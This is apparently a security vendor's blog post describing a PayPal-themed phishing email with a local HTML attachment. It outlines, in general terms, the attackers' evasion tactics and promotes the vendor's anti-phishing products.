Phishing scams have been around for over twenty years. It appears unlikely that they will ever go away. Targeting anyone with an email address, they continue to be a persistent threat. Recently, even some of Check Point’s executives were recently targeted.
The below email, purportedly from PayPal, is an example of emails that potential victims receive. Fortunately, in this particular case it was blocked by Check Point’s Anti-Spam & Email Security Software Blade.
Phishing scam using PayPal as the hook
The approach is simple: the email states that someone tried to access the person’s account, and he should therefore verify his account by downloading and opening the attachment.
Compared to other more sophisticated phishing campaigns, this one is relatively simple, but unfortunately many users have fallen for it, because of its “official” appearance.
Phishing scammers succeed because they effectively imitate things that are familiar to us – things like common services (like PayPal), invoices and resumes. Despite increased employee education and awareness, the success rate for phishing scams remains relatively high. According to Verizon’s 2016 Data Breach Investigations Report, 30% of phishing messages were opened by the target across all campaigns.
Infiltrating through security
The attacker behind this phishing attempt employed several different techniques in their attempt to infiltrate security measures.
- Using a local phishing site instead of an internet site:
Online phishing pages, i.e. bogus sites masquerading as the legitimate item, are an outdated tactic easily identified by security vendors. For this reason, the attackers did not upload their phishing site to the internet. Instead they used an email attachment and provided incentive for the victim to open it.
- Obfuscating the phishing site:
Some vendors are capable of blocking local phishing sites by tracing the URL. If the detected URL is suspicious, the phishing attempt is blocked. By obfuscating the webpage, the attackers hope to deceive these security measures and prevent them from inspecting the page.
- Validating the data that is entered into the phishing form:
A known tactic to combat phishing scams is to enter false credentials to understand where the data is sent or to flood the attackers with invalid credentials. To avoid both of these defensive measures, the attackers validate the credentials entered into the phishing form before sending them to their servers.
So how did we protect ourselves (and how can you do the same?)
This particular phishing attempt emphasizes the need for advanced security measures that can protect you from phishing scams, as well as educating employees to be cautious when opening emails. As seen here, phishing has developed evasive techniques that could easily bypass low level security solutions.
The Check Point Anti-Spam & Email Security Software Blade protects customers from falling victim to such scams. Its multidimensional approach protects email infrastructure, provides highly accurate anti-spam coverage, and defends organizations from a wide variety of virus and malware threats delivered within email. In addition, SandBlast™ Agent with Zero Phishing™ technology protects organizations from new and unknown phishing sites, as well as from threats contained in documents and links delivered via email.